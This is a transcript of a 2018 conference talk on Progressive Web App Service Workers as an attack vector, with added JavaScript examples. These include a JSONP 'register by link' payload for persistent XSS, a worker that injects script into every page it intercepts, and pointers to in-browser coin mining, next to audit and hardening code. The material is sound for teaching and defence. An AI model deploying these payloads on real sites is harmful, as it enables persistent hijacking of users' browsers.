
PWA as a New Cyber Attack Vector

Progressive Web Apps have been one of the hottest topics of recent years: big companies have adopted them, and they now compete with native applications. The main API for building a PWA is the Service Worker. But have you thought of it as a possible browser vulnerability? Is it secure enough? Should users be careful with it? These questions are very relevant now that almost all vendors have shipped, or are developing, Service Worker support.

Vitalii Bobrov

May 10, 2018

Transcript

  1. PWA as a New
    Cyber Attack Vector

  2. @bobrov1989
    Vitalii Bobrov
    • tech experimenter
    • more than 5 years in front-end
    • open-source contributor
    • mentor
    https://vitaliy-bobrov.github.io/

  3. What are you, PWA?

  4. –MDN
    “PWA use modern web APIs along with
    progressive enhancement strategy to create
    cross-platform web apps…
    …provide several features that give them the
    same UX advantages as native apps. ”
    https://developer.mozilla.org/en-US/Apps/Progressive

  5. Features
    • offline capabilities
    • notifications
    • background sync
    • real app experience

  6. Service Worker
    The ❤ and of PWA

  7. What are you,
    Service Worker?

  8. Service Worker is an
    event-driven worker acting as a
    proxy middleware
    (diagram: Browser ⇄ SW ⇄ Network)

  9. Availability
    ?

  10. Possibilities
    • executes in a separate thread, off the page's main thread
    • can intercept every request made within its scope
    • has access to the Cache Storage API
    • can run with no page open: the browser starts it for events

  11. Responsibility
    Use the FORCE in the RIGHT way

  12. Security Restrictions
    • requires HTTPS (localhost is exempt for development)
    • script must be served from the same origin; scope defaults to the script's directory
    • executes in the limited ServiceWorkerGlobalScope (no DOM, no synchronous XHR)
    • terminated when idle, restarted by the next event

  13. SW lifecycle
    No Service Worker → Install → Active (or Error)
    Active → Idle → Terminated
    Fetch / Message events wake the worker again

  14. Installation
    Hidden UX

  15. chrome://inspect/#service-workers

  16. chrome://serviceworker-internals/
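Slides 15 and 16 point at Chrome's own inspectors. The following is an added example (not from the talk) of the same check done programmatically: enumerate the registrations an origin holds and flag those that look like they were installed through a JSONP-style endpoint rather than a deployed sw.js. The heuristics in analyzeRegistration, the parameter names and the sample registrations are assumptions made for this example.

```javascript
// Added example, not from the talk: audit this origin's service-worker registrations.
// The heuristics below are assumptions for the demo, not a standard; they target the
// "register by link" pattern (worker script served by a JSONP endpoint on the same origin).
const CALLBACK_PARAMS = ['callback', 'cb', 'jsonp'];

// Works on real ServiceWorkerRegistration objects and on plain objects of the same shape.
function analyzeRegistration(reg) {
  const worker = reg.active || reg.waiting || reg.installing;
  const findings = [];
  if (!worker) {
    return { scope: reg.scope, scriptURL: null, findings: ['registration has no worker attached'], reg };
  }
  const script = new URL(worker.scriptURL);
  for (const p of CALLBACK_PARAMS) {
    if (script.searchParams.has(p)) findings.push(`script URL carries JSONP-style parameter "${p}"`);
  }
  if (!/\.m?js$/i.test(script.pathname)) findings.push('script path does not end in .js');
  // The default maximum scope is the script's directory; a wider scope needs a
  // Service-Worker-Allowed response header, which a legitimate deployment rarely sets.
  const scriptDir = script.pathname.slice(0, script.pathname.lastIndexOf('/') + 1);
  const scopePath = new URL(reg.scope).pathname;
  if (!scopePath.startsWith(scriptDir)) {
    findings.push(`scope ${scopePath} is wider than the script directory ${scriptDir}`);
  }
  return { scope: reg.scope, scriptURL: worker.scriptURL, findings, reg };
}

function auditRegistrations(registrations) {
  return registrations.map(analyzeRegistration).filter((r) => r.findings.length > 0);
}

// In a page or the DevTools console: list (and optionally remove) suspicious registrations.
async function auditLiveRegistrations(unregister = false) {
  const suspicious = auditRegistrations(await navigator.serviceWorker.getRegistrations());
  if (unregister) await Promise.all(suspicious.map((r) => r.reg.unregister()));
  return suspicious.map(({ scope, scriptURL, findings }) => ({ scope, scriptURL, findings }));
}

// Constructed sample data (not real registrations) so the audit can be run offline.
const SAMPLE_REGISTRATIONS = [
  { scope: 'https://app.example/', active: { scriptURL: 'https://app.example/sw.js' } },
  { scope: 'https://app.example/', active: { scriptURL: 'https://app.example/api/jsonp?callback=evil' } },
];
```

Run auditLiveRegistrations(true) from the affected origin to remove what it flags; the unregister() call takes effect once the worker's clients are gone, so reload afterwards. The heuristics are deliberately loose: a registration that passes them is not proven clean, and a script URL with a query string is still worth reading by hand.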

  17. Register by link
    XSS + JSONP + Service Worker

  18. JSONP for XSS
    • my-domain.com/jsonp?callback=myCallback
    • no XHR, so the Same Origin Policy doesn’t apply
    • myCallback runs in the global scope

  19. Service Worker makes
    XSS attack persistent
    https://c0nradsc0rner.wordpress.com/2016/06/17/xss-persistence-using-jsonp-and-serviceworkers/
    https://www.owasp.org/images/3/35/2017-04-20-JSONPXSS.pdf
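The mechanism in slides 17 to 19 hinges on one server-side defect: a JSONP endpoint that reflects its callback parameter verbatim gives an attacker a same-origin URL that serves arbitrary JavaScript, which is exactly what navigator.serviceWorker.register() needs. Below is an added example (not code from the talk or the linked write-ups) of such an endpoint beside a hardened version, with the request objects constructed as plain records rather than taken from any real framework; the Service-Worker request header check and the callback pattern are the hardening choices of this example.

```javascript
// Added example (not from the talk or the linked write-ups): a JSONP endpoint that reflects
// its callback parameter, next to a hardened version. Requests are plain constructed
// { query, headers } records standing in for a real framework's request object.

// Identifier, optionally dotted (e.g. "app.onUsers"), bounded in length.
const CALLBACK_RE = /^[A-Za-z_$][\w$]{0,63}(?:\.[A-Za-z_$][\w$]{0,63})*$/;

// Vulnerable: whatever arrives in ?callback= is emitted as JavaScript on this origin.
function jsonpVulnerable(req, data) {
  const cb = (req.query && req.query.callback) || 'callback';
  return {
    status: 200,
    headers: { 'Content-Type': 'application/javascript' },
    body: `${cb}(${JSON.stringify(data)});`,
  };
}

// Hardened: never act as a worker script, and only accept identifier-shaped callbacks.
function jsonpHardened(req, data) {
  const headers = req.headers || {};
  // Browsers add "Service-Worker: script" to the fetch of a service-worker script, so an
  // endpoint that is not one can refuse outright (assumption: header keys are lower-cased).
  if (String(headers['service-worker'] || '').toLowerCase() === 'script') {
    return { status: 403, headers: { 'Content-Type': 'text/plain' }, body: 'not a worker script' };
  }
  const cb = (req.query && req.query.callback) || 'callback';
  if (!CALLBACK_RE.test(cb)) {
    return { status: 400, headers: { 'Content-Type': 'text/plain' }, body: 'invalid callback' };
  }
  return {
    status: 200,
    headers: {
      'Content-Type': 'application/javascript; charset=utf-8',
      'X-Content-Type-Options': 'nosniff',
    },
    body: `/**/ ${cb}(${JSON.stringify(data)});`,
  };
}

// The "register by link" payload: the callback is an entire worker body, and the trailing
// "//" comments out the "(...)" the endpoint appends, so the response parses as a script.
// From an XSS the whole attack is one call:
//   navigator.serviceWorker.register('/jsonp?callback=' + encodeURIComponent(SW_PAYLOAD));
const SW_PAYLOAD = "self.addEventListener('fetch',e=>e.respondWith(fetch(e.request)));//";
const attackerRequest = { query: { callback: SW_PAYLOAD }, headers: { 'service-worker': 'script' } };
const normalRequest = { query: { callback: 'app.onUsers' }, headers: {} };

// Models the browser's acceptance test for a worker script (same origin assumed):
// a 200 with a JavaScript MIME type is enough.
function browserWouldAcceptAsWorker(resp) {
  const ct = String(resp.headers['Content-Type'] || '').toLowerCase();
  return resp.status === 200 && /^(?:text|application)\/(?:x-)?(?:javascript|ecmascript)/.test(ct);
}
```

The callback pattern is the fix that matters: it removes the ability to put statements into the response at all, whether or not the script is meant for a worker. The header check is belt and braces against the specific registration trick, and since JSONP exists only because the endpoint predates CORS, replacing it with a CORS-enabled JSON endpoint removes the class of bug entirely.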

  20. Decoded & Formatted

  21. HTTP Interceptor
    ALL requests controlled by the Service Worker

  22. https://jakearchibald.github.io/isserviceworkerready/demos/fetchevent/

  23. (same fetch-event demo as slide 22)

  24. (same fetch-event demo as slide 22)

  25. Service Worker could
    kill browser extensions

  26. Modify
    uploads & downloads
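Slides 21 and 26 describe what a worker can do once installed: every request in scope passes through its fetch handler, so responses (and, by the same route, uploads read from request.clone()) can be rewritten before the page sees them. The following is an added example (not code from the talk) of that pattern, split so the decision and rewrite logic are plain functions that run in Node, while the event wiring at the end only executes inside a real ServiceWorkerGlobalScope. The injected tag path is a placeholder chosen for this example.

```javascript
// Added example, not code from the talk: the interception pattern behind slides 21 and 26.
// The decision and rewrite logic are plain functions (runnable in Node); the event wiring at
// the end only executes inside a real ServiceWorkerGlobalScope. INJECTED_TAG is a placeholder.
const INJECTED_TAG = '<script src="/assets/injected.js"></script>'; // assumption for the demo

// Only same-origin HTML navigations are rewritten; everything else is proxied untouched,
// so the site keeps working and nothing looks broken to the user.
function classifyRequest(req, selfOrigin) {
  const url = new URL(req.url);
  if (url.origin !== selfOrigin) return 'passthrough';
  if (req.method === 'GET' && req.destination === 'document') return 'rewrite-document';
  return 'passthrough';
}

// Insert a tag before </head>; if there is no head, prepend it.
function rewriteHtml(html, tag) {
  return /<\/head>/i.test(html) ? html.replace(/<\/head>/i, () => `${tag}</head>`) : tag + html;
}

// Headers copied from the upstream response must lose the framing headers, because the
// body was decoded and re-serialised (new length, no content encoding).
function responseHeadersFor(upstreamHeaders) {
  const h = new Headers(upstreamHeaders);
  h.delete('content-length');
  h.delete('content-encoding');
  return h;
}

if (typeof ServiceWorkerGlobalScope !== 'undefined') {
  // Take over every open tab immediately instead of waiting for the next navigation.
  self.addEventListener('install', (e) => e.waitUntil(self.skipWaiting()));
  self.addEventListener('activate', (e) => e.waitUntil(self.clients.claim()));

  self.addEventListener('fetch', (event) => {
    const r = event.request;
    const kind = classifyRequest(
      { url: r.url, method: r.method, destination: r.destination },
      self.location.origin,
    );
    if (kind !== 'rewrite-document') return; // no respondWith(): the browser handles it normally
    event.respondWith((async () => {
      const upstream = await fetch(r);
      const html = rewriteHtml(await upstream.text(), INJECTED_TAG);
      return new Response(html, {
        status: upstream.status,
        statusText: upstream.statusText,
        headers: responseHeadersFor(upstream.headers),
      });
    })());
  });
}
```

A text download is handled the same way through upstream.text(); a binary one through upstream.arrayBuffer(). On the defensive side, a response served this way shows "(ServiceWorker)" in the Size column of Chrome's Network panel, and the worker itself is listed under Application > Service Workers and at chrome://serviceworker-internals, which is why those two inspectors matter.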

  27. Use WebAssembly
    to perform modifications ⚡ fast

  28. https://medium.com/@kennethrohde/on-the-fly-webp-decoding-using-wasm-and-a-service-worker-33e519d8c21e

  29. Use Resources
    perform computation on the remote (the user's) machine

  30. http://hub.kotofabrika.com/

  31. https://coinhive.com/

  32. https://github.com/cazala/coin-hive

  33. Allows to compute
    without browser

  34. “Wakeup” APIs
    • SyncManager (Background Sync: fires the worker's sync event)
    • PushManager (Push API: a push service fires the worker's push event, no open page needed)
    • postMessage (from an open page or another worker)

  35. Thank you!
    @bobrov1989
    https://vitaliy-bobrov.github.io/